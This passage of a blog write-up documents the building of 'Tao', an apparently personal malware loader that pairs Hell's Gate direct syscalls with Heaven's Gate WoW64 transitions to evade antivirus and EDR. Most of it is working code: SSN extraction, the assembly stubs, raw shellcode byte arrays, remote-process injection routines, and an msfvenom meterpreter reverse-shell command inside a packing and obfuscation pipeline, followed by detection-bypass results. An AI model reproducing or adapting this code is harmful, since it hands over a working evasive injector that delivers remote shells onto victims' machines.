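uint64_t djb2_seeded(const char *str, uint64_t seed)
{
    uint64_t hash = seed;
    unsigned char c;

    /* (hash << 5) + hash is hash * 33; arithmetic wraps modulo 2^64 */
    while ((c = (unsigned char)*str++) != 0)
        hash = ((hash << 5) + hash) + c;

    return hash;
}
```

With the classic seed 5381, the string "a" hashes to 5381 * 33 + 97 = 177670. Changing the seed changes every resulting hash, so the pre-defined hashes have to be recomputed with the same seed.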

GetVxTableEntry

This function is relatively large, so we’ll divide it into two parts. Let’s quickly review the workflow so far.

As mentioned, we need the base address of ntdll.dll, which we get by reaching the PEB through the TEB; obtaining the TEB is wrapped in the RtlGetThreadEnvironmentBlock function. After that, we use GetImageExportDirectory to get the export directory of ntdll.dll which, as shown in the previous section, is done by parsing the DOS and NT headers. Next, for each system call we need, we calculate the hash of its name and initialize the dwHash member with it, for example NtAllocateVirtualMemory.dwHash.

Every time we finish initializing an entry, GetVxTableEntry is called. It walks the export names looking for one whose djb2 hash equals the pre-defined hash. Those pre-defined hashes are calculated from the names of the system calls we need; I refer to them as target functions here. Once a name matches the hash of a target function, the address of that system call is saved into pVxTableEntry->pAddress.

BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
 PDWORD pdwAddressOfFunctions    = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
 PDWORD pdwAddressOfNames        = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
 PWORD pwAddressOfNameOrdinales  = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
    // I think pwAddressOfNameOrdinales is a typo from original code

 for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
  PCHAR pczFunctionName  = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
  PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

  if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
   pVxTableEntry->pAddress = pFunctionAddress;

   // ... part 2
  }
 }

 return TRUE;
}
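
The part that tends to confuse people is the double lookup: the index into the name array is not the index into the function array; it first goes through the ordinal array. Here is a small sketch of just that indirection over plain arrays. The ExportView type and the function name are hypothetical, and it compares names with strcmp instead of hashes to keep it short.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified view of the three parallel export arrays. */
typedef struct {
    const char *const *names;         /* AddressOfNames, resolved to strings */
    const uint16_t    *name_ordinals; /* AddressOfNameOrdinals */
    const uint32_t    *functions;     /* AddressOfFunctions (RVAs) */
    uint32_t           number_of_names;
} ExportView;

/* Returns 1 and stores the function RVA in *rva if target is exported. */
int lookup_export_rva(const ExportView *view, const char *target, uint32_t *rva)
{
    for (uint32_t i = 0; i < view->number_of_names; i++) {
        if (strcmp(view->names[i], target) == 0) {
            /* name index -> ordinal -> function RVA */
            *rva = view->functions[view->name_ordinals[i]];
            return 1;
        }
    }
    return 0;
}
```

With names {"Alpha", "Beta", "Gamma"}, ordinals {2, 0, 1}, and functions {0x1100, 0x1200, 0x1300}, looking up "Alpha" returns 0x1300 rather than 0x1100, because its ordinal entry points at slot 2.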

And the second part is the main part where Hell’s Gate trick belongs.

// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
 // check if syscall, in this case we are too far
 if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
  return FALSE;

 // check if ret, in this case we are also probaly too far
 if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
  return FALSE;

 // First opcodes should be :
 //    MOV R10, RCX
 //    MOV EAX, <syscall>
 if (*((PBYTE)pFunctionAddress + cw) == 0x4c
  && *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
  && *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
  && *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
  && *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
  && *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
  BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
  BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
  pVxTableEntry->wSystemCall = (high << 8) | low;
  break;
 }

 cw++;
};

Once pFunctionAddress is found, the code enters a while loop that searches for the bytes 0x4c, 0x8b, 0xd1, 0xb8, followed by two SSN bytes and then 0x00, 0x00. These are the opcodes of mov r10, rcx and mov eax, SSN, the first bytes of an unhooked system call stub. If the system call is hooked, the opcodes may not match, since AV/EDR places its hook before the syscall instruction. To cope with this, Hell’s Gate keeps an offset variable called cw: whenever the pattern does not match, cw is incremented by 1, so the next loop iteration compares the bytes one position further down. This process repeats, sliding down the stub, until the mov r10, rcx and mov eax, SSN opcodes are found. This image illustrates how it finds the opcodes by traversing the addresses.

Hell's Gate Search Path

To keep the search from running too far and picking up the SSN of a neighbouring system call, there are 2 if-statements at the beginning of the while loop that check whether the current bytes are a syscall or ret instruction. If you remember, those 2 instructions sit at the bottom of a system call stub. If either of them is reached before the prologue pattern has been seen, the function returns FALSE.
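
The sliding search and its two stop conditions can be sketched on an ordinary byte buffer. This is only an illustration, assuming a hypothetical find_stub_prologue helper and a caller-supplied length so the scan cannot run past the buffer; the original code has no such bound.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: scan `buf` for the prologue
 *   4c 8b d1  b8 <lo> <hi> 00 00   (mov r10, rcx ; mov eax, SSN)
 * Returns the offset of the prologue, or -1 if a syscall (0f 05) or
 * ret (c3) byte is reached first or the buffer is exhausted. */
long find_stub_prologue(const uint8_t *buf, size_t len) {
    assert(buf != NULL || len == 0);

    for (size_t off = 0; off < len; off++) {
        /* Stop condition 1: syscall reached, we went too far. */
        if (off + 1 < len && buf[off] == 0x0f && buf[off + 1] == 0x05)
            return -1;

        /* Stop condition 2: ret reached, we also went too far. */
        if (buf[off] == 0xc3)
            return -1;

        /* Only compare when all 8 prologue bytes are inside the buffer. */
        if (off + 8 <= len
            && buf[off]     == 0x4c && buf[off + 1] == 0x8b
            && buf[off + 2] == 0xd1 && buf[off + 3] == 0xb8
            && buf[off + 6] == 0x00 && buf[off + 7] == 0x00)
            return (long)off;
    }
    return -1;
}
```

Like the original, this compares raw bytes rather than decoding instructions, so a 0xc3 byte that happens to sit inside an operand would also stop the search.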

On the other hand, if the opcodes match, Hell’s Gate calculates the SSN and stores it in pVxTableEntry->wSystemCall. The function shifts the high variable left by 8 bits and then does a bitwise OR with the low variable. This is needed because x64 is little-endian: in the immediate operand of mov eax, SSN, the lower byte (low) is stored first and the higher byte (high) comes after it, so the operation puts the higher byte back on the left and the lower byte on the right to form the actual value. Let’s walk through an example to make this clearer, using NtAllocateVirtualMemoryEx as the target whose SSN we calculate.

NtAllocateVirtualMemoryEx

In this graph, we can see that the opcodes of mov r10, rcx are 4c8bd1 and those of mov eax, 0x76 are b876000000. If we put these bytes into a table, it looks like this.

| opcode | offset |
| --- | --- |
| 4c | 0 |
| 8b | 1 |
| d1 | 2 |
| b8 | 3 |
| 76 | 4 |
| 00 | 5 |
| 00 | 6 |
| 00 | 7 |

Let’s take another look at the SSN calculation code.

BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;

Here high is the byte at offset 5, which is 00, and low is the byte at offset 4, which is 76. We can use ipython to calculate (high << 8) | low. The result is indeed the SSN 0x76.

In [1]: hex((0x00 << 8) | 0x76)
Out[1]: '0x76'
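
The same calculation can be written as a small C helper. This is a sketch, assuming a hypothetical ssn_from_stub function that is handed a pointer to the first byte of the matched pattern (the 0x4c byte) and at least 6 readable bytes:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: rebuild the 16-bit SSN from the little-endian
 * immediate of `mov eax, imm32`, which starts at offset 4 of the stub.
 * Offset 4 holds the low byte, offset 5 holds the high byte. */
uint16_t ssn_from_stub(const uint8_t *stub) {
    assert(stub != NULL);

    uint8_t low  = stub[4];
    uint8_t high = stub[5];
    return (uint16_t)(((uint16_t)high << 8) | low);
}
```

For the stub in the table above (low = 0x76, high = 0x00) this yields 0x76. An immediate stored as 18 01 would yield 0x0118, which shows why the high byte has to be shifted before the two are combined.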

hellsgate.asm

Besides the C code, the original Hell’s Gate implementation also contains an assembly file. It defines 2 procedures, HellsGate and HellDescent, which are used to set up and execute the direct system calls.

; Hell's Gate
; Dynamic system call invocation
;
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)

.data
 wSystemCall DWORD 000h      ; global variable to keep the SSN

.code
 HellsGate PROC
  mov wSystemCall, 000h
  mov wSystemCall, ecx    ; move `ecx` (input argument) to wSystemCall
  ret
 HellsGate ENDP

 HellDescent PROC
  mov r10, rcx
  mov eax, wSystemCall    ; `wSystemCall` is now the SSN of the system call

  syscall
  ret
 HellDescent ENDP
end

The HellsGate function takes 1 argument, the SSN. It first uses mov wSystemCall, 000h to reset the value to 0, then uses mov wSystemCall, ecx to store ecx in it; here ecx holds the SSN.

The second one, HellDescent, performs the actual system call. On x64 Windows, the kernel expects the SSN in the eax register, while the caller passes the first four parameters in rcx, rdx, r8 and r9. HellDescent first copies rcx to r10, because the syscall instruction overwrites rcx with the return address, and then loads the SSN from the wSystemCall variable into eax. After this, everything is ready for the syscall instruction, which enters ring 0 directly to call the system service.

To see how all the functions above fit together to invoke a system call, you can read the Payload function in the original implementation. Since it’s not used in Tao, we’ll skip this part and leave it to you.

Yin & Yang, the Eternal Tao of Duality

Tao uses Heaven’s Gate & Hell’s Gate at the same time to try to bypass AV/EDR detection. It aims not only to evade the API hooks placed by security solutions but also to bypass interception at the WoW64 layer, so that it can execute 64-bit syscalls directly and avoid user-mode monitoring.

For people who think “talk is cheap, show me the code”, here you are. Be aware that in Zig you have to declare the Windows structures yourself and use the extern keyword to import the native Windows APIs.

Tao is still in the very early stages of development, so some parts of the code and the build process may undergo significant changes in the future. This article only records the design process of the initial version.

Why Heaven & Hell

There are a lot of ways to perform direct system calls, so why did I choose Hell’s Gate? Because Hell’s Gate retrieves the SSN dynamically, whereas something like SysWhispers needs an SSN table that has to be updated for different versions and builds of Windows. Therefore, I consider Hell’s Gate the best way to write direct system calls that work across versions.

Prerequisites

Donut is a tool that can turn an EXE into shellcode. This is its description on GitHub.

Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters

ZYPE is a shellcode encryptor/obfuscator that takes shellcode as input and generates a Zig code snippet containing the encrypted/obfuscated shellcode. Tao relies heavily on ZYPE for obfuscation.

ZYRA is an executable packer for PE, ELF and Mach-O. It encrypts the original executable and embeds it into another one, which makes both static and dynamic analysis more difficult and time-consuming.

Overall Workflow

This is the overall workflow for Tao. It’s simplified, so if you want to learn the full process, you can read the code on your own.

  1. Generate the encrypted reverse shell shellcode
    1. Generate a reverse shell shellcode using msfvenom by msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw -o revshell.bin.
    2. Use ZYPE to generate the encrypted shellcode by zype -f revshell.bin -m mac.
  2. Deobfuscate and call the above shellcode by direct system call in Hell’s Gate implementation.
    1. Use zig build-exe -target x86_64-windows src/hell.zig to build the hell.exe.
    2. Use .\Donut.exe hell.exe to turn the hell.exe into shellcode.
    3. Obfuscate the Hell’s Gate shellcode with ZYPE again.
  3. Wrap the Hell’s Gate shellcode in the previous step into Heaven’s Gate implementation.
    1. Use zig build to generate the final binary.
  4. Pack the binary.

If that’s not so easy to follow, I also drew a diagram to illustrate the workflow.

Workflow

Since obfuscation and packing are not the main point of this article, I won’t explain them here, but you can read the code on your own.

These are the target processes of Heaven’s Gate and Hell’s Gate in Tao.

| | Heaven’s Gate | Hell’s Gate |
| --- | --- | --- |
| Target Process | RuntimeBroker.exe | notepad.exe |

heaven.zig

Most of the functions are the same as in the previous explanation, just rewritten in Zig, so I’m only going to focus on the parts that differ. These are the conditions for using Heaven’s Gate.

  1. The current process (Tao in this case) should be in WoW64
  2. The remote process should not be in WoW64, which means it should be a native 64-bit process

To check these conditions in code, we use the following helper function. It uses GetModuleHandleA and GetProcAddress to dynamically resolve the NtQueryInformationProcess function, which lets us query whether the passed process handle belongs to a WoW64 process.

pub fn is_process_wow64(ProcessHandle: HANDLE) BOOL {
    var pNtQueryInformationProcess: fnNtQueryInformationProcess = undefined;
    var pIsWow64: ?*anyopaque = null;

    const ntdll_handle = GetModuleHandleA("NTDLL.DLL") orelse {
        print("[!] GetModuleHandleA failed\n", .{});
        return 0;
    };

    const proc_addr = GetProcAddress(ntdll_handle, "NtQueryInformationProcess") orelse {
        print("[!] GetProcAddress Failed With Error: {d}\n", .{GetLastError()});
        return 0;
    };

    pNtQueryInformationProcess = @ptrCast(@alignCast(proc_addr));

    const status = pNtQueryInformationProcess(ProcessHandle, ProcessWow64Information, @ptrCast(&pIsWow64), @sizeOf(?*anyopaque), null);
    if (status != STATUS_SUCCESS) {
        print("[!] NtQueryInformationProcess Failed With Error: 0x{X:0>8}\n", .{@intFromEnum(status)});
        return 0;
    }

    return if (pIsWow64 != null) 1 else 0;
}

If you remember, we had execute64.asm and remotethread.asm in the Heaven’s Gate introduction. Here we’re going to use their shellcode versions, bExecute64 and bFunction64.

const bExecute64 linksection(".text") = [_]u8{
    0x55, 0x89, 0xE5, 0x56, 0x57, 0x8B, 0x75, 0x08, 0x8B, 0x4D, 0x0C, 0xE8, 0x00, 0x00, 0x00, 0x00,
    0x58, 0x83, 0xC0, 0x2B, 0x83, 0xEC, 0x08, 0x89, 0xE2, 0xC7, 0x42, 0x04, 0x33, 0x00, 0x00, 0x00,
    0x89, 0x02, 0xE8, 0x0F, 0x00, 0x00, 0x00, 0x66, 0x8C, 0xD8, 0x66, 0x8E, 0xD0, 0x83, 0xC4, 0x14,
    0x5F, 0x5E, 0x5D, 0xC2, 0x08, 0x00, 0x8B, 0x3C, 0xE4, 0xFF, 0x2A, 0x48, 0x31, 0xC0, 0x57, 0xFF,
    0xD6, 0x5F, 0x50, 0xC7, 0x44, 0x24, 0x04, 0x23, 0x00, 0x00, 0x00, 0x89, 0x3C, 0x24, 0xFF, 0x2C,
    0x24,
};

const bFunction64 linksection(".text") = [_]u8{
    0xFC, 0x48, 0x89, 0xCE, 0x48, 0x89, 0xE7, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC8, 0x00, 0x00, 0x00,
    0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48,
    0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A,
    0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9,
    0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C,
    0x48, 0x01, 0xD0, 0x66, 0x81, 0x78, 0x18, 0x0B, 0x02, 0x75, 0x72, 0x8B, 0x80, 0x88, 0x00, 0x00,
    0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40,
    0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6,
    0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0,
    0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40,
    0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0,
    0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58,
    0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A,
    0x48, 0x8B, 0x12, 0xE9, 0x4F, 0xFF, 0xFF, 0xFF, 0x5D, 0x4D, 0x31, 0xC9, 0x41, 0x51, 0x48, 0x8D,
    0x46, 0x18, 0x50, 0xFF, 0x76, 0x10, 0xFF, 0x76, 0x08, 0x41, 0x51, 0x41, 0x51, 0x49, 0xB8, 0x01,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xD2, 0x48, 0x8B, 0x0E, 0x41, 0xBA, 0xC8,
    0x38, 0xA4, 0x40, 0xFF, 0xD5, 0x48, 0x85, 0xC0, 0x74, 0x0C, 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xEB, 0x0A, 0x48, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x48, 0x83, 0xC4, 0x50, 0x48, 0x89, 0xFC, 0xC3,
};

Remember, we need to put them in the .text section since we need to execute the code. If you don’t put them there, you need to change the memory protection to executable yourself.

Now, let’s see the main function of our heaven.zig. The injectShellcode function is exported to keep things modular. It expects 3 input arguments: the process ID, the shellcode buffer and the length of the shellcode.

First, we check that all the parameters are valid.

if (process_id == 0 or shellcode_buf == null or shellcode_len == 0) {
    print("[-] Invalid parameters provided\n", .{});
    return 0;
}

After this, we cast the shellcode buffers to function pointers so that we can easily call them later.

// Cast .text code byte stubs to function pointers
fn_execute64 = @ptrCast(@alignCast(&bExecute64[0]));
fn_function64 = @ptrCast(@alignCast(&bFunction64[0]));

Then we obtain a handle to the remote process so that we can operate on it.

process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);
if (process_handle == null) {
    print("[-] OpenProcess Failed with Error: {x}\n", .{GetLastError()});
    return success;
}

Once we get the handle, we’ll use the is_process_wow64 function to check the conditions to use Heaven’s Gate.

// Check if current process is Wow64
if (is_process_wow64(GetCurrentProcess()) == 0) {
    print("[-] Current process is not a Wow64 process\n", .{});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
} else {
    print("[*] Current process is Wow64\n", .{});
}

// Check if remote process is 64-bit (not Wow64)
if (is_process_wow64(process_handle.?) != 0) {
    print("[-] Remote process {d} is a Wow64 process\n", .{process_id});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

Next, we need to allocate executable memory in the remote process and write the shellcode into it.

// Allocate memory in remote process
virtual_memory = VirtualAllocEx(process_handle.?, null, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (virtual_memory == null) {
    print("[-] VirtualAllocEx Failed with Error: {d}\n", .{GetLastError()});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

print("[*] Allocated memory at: 0x{X} [{d} bytes]\n", .{ @intFromPtr(virtual_memory.?), shellcode_len });

// Write shellcode to remote process
if (WriteProcessMemory(process_handle.?, virtual_memory.?, shellcode_buf.?, shellcode_len, &written) == 0) {
    print("[-] WriteProcessMemory Failed with Error: {d}\n", .{GetLastError()});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

Now, we can prepare the WoW64 context and perform the Heaven’s Gate injection.

// Prepare 64-bit injection context
wow64_ctx.h.hProcess = process_handle.?;
wow64_ctx.s.lpStartAddress = virtual_memory;
wow64_ctx.p.lpParameter = null;
// hThread is already zeroed from std.mem.zeroes

print("[*] About to execute Heaven's Gate transition...\n", .{});

// Switch the processor to 64-bit mode and execute the 64-bit code stub
const result = fn_execute64(fn_function64, @ptrCast(&wow64_ctx));
print("[*] Heaven's Gate transition completed, result: {d}\n", .{result});

if (result == 0) {
    print("[-] Failed to switch processor context and execute 64-bit stub\n", .{});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

// Check if remote thread was created
if (@intFromPtr(wow64_ctx.t.hThread) == 0) {
    print("[-] Failed to create remote thread under 64-bit mode\n", .{});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

print("[*] Thread created: 0x{x}\n", .{@intFromPtr(wow64_ctx.t.hThread)});

Finally, we need to resume the suspended thread and clean up the handle.

// Resume thread that has been created in a suspended state
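// ResumeThread returns the previous suspend count, or 0xFFFFFFFF ((DWORD)-1) on failure
// (assumes ResumeThread is declared as returning DWORD)
if (ResumeThread(wow64_ctx.t.hThread.?) == 0xFFFFFFFF) {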
    print("[-] ResumeThread Failed with Error: {d}\n", .{GetLastError()});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

print("[+] Successfully injected thread ({x})\n", .{@intFromPtr(wow64_ctx.t.hThread)});

success = 1;

// Cleanup
if (process_handle) |handle| {
    _ = CloseHandle(handle);
}

return success;

hell.zig

In hell.zig, we need to declare the HellsGate and HellDescent functions that we mentioned before. To do so, we can put global assembly in a comptime block in Zig, so the assembly functions are defined at compile time. By the way, Zig currently supports only AT&T syntax here, since its assembly parsing is provided by LLVM.

Only Support AT&T Syntax in Zig 0.14.1

So we need to convert the code from the original implementation to AT&T syntax. This is how I did it.

comptime {
    asm (
        \\.data
        \\w_system_call: .long 0
        \\
        \\.text
        \\.globl hells_gate
        \\hells_gate:
        \\    movl $0, w_system_call(%rip)
        \\    movl %ecx, w_system_call(%rip)
        \\    ret
        \\
        \\.globl hell_descent
        \\hell_descent:
        \\    mov %rcx, %r10
        \\    movl w_system_call(%rip), %eax
        \\    syscall
        \\    ret
    );
}

// External function declarations for the global assembly
pub extern fn hells_gate(syscall_number: DWORD) void;
pub extern fn hell_descent(arg1: usize, arg2: usize, arg3: usize, arg4: usize, arg5: usize, arg6: usize, arg7: usize, arg8: usize, arg9: usize, arg10: usize, arg11: usize) callconv(.C) NTSTATUS;

Then, we set up the VxTable and VxTableEntry structures for later use.

// Structures for Hell's Gate
pub const VxTableEntry = extern struct {
    addr_ptr: ?PVOID,
    hash: u64,
    system_call: WORD,
};

pub const VxTable = extern struct {
    NtAllocateVirtualMemory: VxTableEntry,
    NtWriteVirtualMemory: VxTableEntry,
    NtProtectVirtualMemory: VxTableEntry,
    NtCreateThreadEx: VxTableEntry,
};

Besides this, the most important function in hell.zig is classicInjectionViaSyscalls. It takes 4 parameters: the Vx table, the remote process handle, the payload to be executed and the length of the payload. It performs classic process injection, but with system calls. This table shows the difference between normal classic process injection and process injection via syscalls.

| Step | Normal | Via Syscall |
| --- | --- | --- |
| Allocate the virtual memory | VirtualAllocEx | NtAllocateVirtualMemory |
| Write the virtual memory | WriteProcessMemory | NtWriteVirtualMemory |
| Change the memory protection | VirtualProtectEx | NtProtectVirtualMemory |
| Create a remote thread for shellcode | CreateRemoteThread | NtCreateThreadEx |

If you remember the Hell’s Gate workflow we went through previously, a system call is performed by using the HellsGate function to store the SSN in the wSystemCall global variable and then using HellDescent to issue the call. Apart from that, it’s just like normal process injection, so let’s review the steps of classic process injection first.

  1. Get the process handle.
  2. Allocate the memory in the target process.
  3. Write the payload in the memory.
  4. Modify the memory protection to be executable.
  5. Create a remote thread in the target process.
  6. Wait for the thread to finish and release the resources.

Since this function (classicInjectionViaSyscalls) already receives a target process handle, we can skip the first step and jump directly to allocating memory in the target process. You can see the code below; note that I renamed HellsGate and HellDescent to hells_gate and hell_descent to match Zig’s coding style.

// Step 1: Allocate memory using Hell's Gate
hells_gate(vx_table.NtAllocateVirtualMemory.system_call);
status = hell_descent(@intFromPtr(process_handle), @intFromPtr(&address), 0, @intFromPtr(&size), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE, 0, 0, 0, 0, 0);

if (status != nt_success) {
    print("[!] NtAllocateVirtualMemory Failed With Error : 0x{X:0>8}\n", .{@intFromEnum(status)});
    return false;
}
print("[+] Allocated Address At : 0x{X} Of Size : {d}\n", .{ @intFromPtr(address), size });

After allocating the memory, we can write the shellcode into it.

// Step 2: Write the payload
print("\t[i] Writing Payload Of Size {d} ... ", .{payload_size});
hells_gate(vx_table.NtWriteVirtualMemory.system_call);
status = hell_descent(@intFromPtr(process_handle), @intFromPtr(address), @intFromPtr(payload), payload_size, @intFromPtr(&bytes_written), 0, 0, 0, 0, 0, 0);

if (status != nt_success or bytes_written != payload_size) {
    print("[!] NtWriteVirtualMemory Failed With Error : 0x{X:0>8}\n", .{@intFromEnum(status)});
    print("[i] Bytes Written : {d} of {d}\n", .{ bytes_written, payload_size });
    return false;
}

Then, change the memory protection.

// Step 3: Change memory protection to executable
hells_gate(vx_table.NtProtectVirtualMemory.system_call);
status = hell_descent(@intFromPtr(process_handle), @intFromPtr(&address), @intFromPtr(&payload_size), PAGE_EXECUTE_READWRITE, @intFromPtr(&old_protection), 0, 0, 0, 0, 0, 0);

if (status != nt_success) {
    print("[!] NtProtectVirtualMemory Failed With Error : 0x{X:0>8}\n", .{@intFromEnum(status)});
    return false;
}

Finally, execute the payload by creating a new thread on the target process.

// Step 4: Execute the payload via thread
print("\t[i] Running Thread Of Entry 0x{X} ... ", .{@intFromPtr(address)});
hells_gate(vx_table.NtCreateThreadEx.system_call);
status = hell_descent(@intFromPtr(&thread_handle), THREAD_ALL_ACCESS, 0, // NULL object attributes
    @intFromPtr(process_handle), @intFromPtr(address), 0, // NULL parameter
    0, // Create flags
    0, // Stack zero bits
    0, // Size of stack commit
    0, // Size of stack reserve
    0 // Bytes buffer
);

if (status != nt_success) {
    print("[!] NtCreateThreadEx Failed With Error : 0x{X:0>8}\n", .{@intFromEnum(status)});
    return false;
}

At this point the Hell’s Gate part is finished. We just need to assemble all the pieces and build the final Tao.exe. I’ll skip this part because there’s nothing worth mentioning; it’s literally just putting everything together. So let’s jump to the final part and see how Tao performs!

Epilogue - Findings & Results

Static Analysis

Let’s look at the VirusTotal scan results first!

Before Packed by ZYRA

After Packed by ZYRA

It looks like the packed one is considered less suspicious than the unpacked one on VirusTotal, but on another platform, Filescan.io, it’s considered more malicious. I took a look at the report and found that this is because the payload decryption is detected and regarded as malicious behaviour, and the higher entropy is also flagged by some security solutions.

It turns out that Tao is much easier to detect than I thought. I expected that hardly any vendor would detect the malicious code, since I had already applied a lot of obfuscation, even nested obfuscation such as a self-made packer.

If we look closer at the scan results, we can see that the most popular threat label is “trojan.hack/msfshell”, and that’s indeed the reverse shell shellcode we used.

Although 9 vendors still labeled it as a malicious file, it did bypass the detection of over 60 vendors. That’s the static analysis part; let’s see Tao’s performance in dynamic analysis.

Dynamic Analysis

I installed some well-known AV/EDR products and ran Tao in my isolated environment. This table shows its ability to bypass dynamic detection. Tao.exe is the unpacked binary and Tao.zyra.exe is the packed one.

| AV/EDR | Tao.exe | Tao.zyra.exe |
| --- | --- | --- |
| Bitdefender | | |
| ESET | | |
| Microsoft Defender Real-time Protection | | |
| Qihoo 360 | | |
| Trend Micro PC-cillin | | |

It really can bypass some well-known AV/EDR products, but not the majority of them. I’ve only tested Tao against these security solutions, but they give an approximate picture. Interestingly, the packed one is even more likely to be blocked; I guess it’s because the runtime file dropping is marked as suspicious behaviour.

Limitations

Although I applied a lot of anti-analysis techniques to this malware, it still failed to bypass some of the AV/EDR products. I concluded that the possible reasons are:

  1. Too many shellcodes from Metasploit.
  2. Donut will generate some signatures.
  3. File dropping from ZYRA will be detected.
  4. Import table contains WinAPI for process injection.
  5. The decrypted/deobfuscated shellcode will be detected during runtime.

Challenges I met

While doing this research, I ran into some issues that had me stuck for a while. For example, the shellcode generated by Donut terminates the original process, since it wraps a full EXE file. Also, I originally wanted to interact with hell.zig through its exported functions, but I found that the compiler won’t allow an x86 program to use x64 registers like r10, which Hell’s Gate needs. I tried a few workarounds for this. For example, I first tried to compile hell.zig to a library instead of an EXE, but it turned out the compiler won’t allow an x86 program to link an x64 library either. I finally resolved the issue by turning hell.zig into shellcode using Donut and executing it in main.zig.

There were still many obstacles while I was working on this project, but most of them have been resolved. I’ve learnt a lot from this and I think I can do better next time. Malware analysis isn’t an easy thing, and malware development is even more so. But I had a lot of fun in this kind of attack and defense, where both sides are trying to bypass each other’s detection and tricks. So I’ll keep doing this kind of stuff, keep learning from this war between attackers and defenders, and make myself a better hacker.

Thanks a lot for reading this far. I hope both of us learnt something new from this article.

Future Work

I think there are several things that can be done better, so I’ll write them down and try to finish them when I get time.

  1. Turn it into a Mythic C2 agent.
  2. The shellcode generated by Donut from a full EXE interrupts the injected process, which is an issue that needs to be solved.
  3. Better evading techniques to bypass more AV/EDR.

References & Credits